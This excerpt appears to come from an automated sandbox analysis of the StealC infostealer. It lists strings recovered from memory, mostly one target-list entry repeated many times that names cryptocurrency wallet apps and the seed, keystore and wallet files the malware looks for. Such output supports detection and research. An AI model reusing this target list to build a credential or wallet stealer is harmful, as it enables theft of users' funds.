Source: stealc_default2.exe, 00000014.00000002.3033783708.0000000001680000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: stealc_default2.exe, 00000014.00000002.3033783708.0000000001680000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: stealc_default2.exe, 00000014.00000002.3033783708.0000000001680000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: stealc_default2.exe, 00000014.00000002.3033783708.0000000001680000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: stealc_default2.exe, 00000014.00000002.3033783708.0000000001680000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: stealc_default2.exe, 00000014.00000002.3033783708.0000000001680000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: stealc_default2.exe, 00000014.00000002.3033783708.0000000001680000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: stealc_default2.exe, 00000014.00000002.3033783708.0000000001680000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ExodusE#
Source: stealc_default2.exe, 00000014.00000002.3033783708.00000000016F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\simple-storage.json
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: EthereumE#
Source: stealc_default2.exe, 00000014.00000002.3033783708.0000000001680000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: stealc_default2.exe, 00000014.00000002.3032875180.0000000000E8D000.00000004.00000001.01000000.00000015.sdmp	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: stealc_default2.exe, 00000014.00000002.3033783708.0000000001680000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: stealc_default2.exe, 00000014.00000002.3033783708.0000000001680000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger 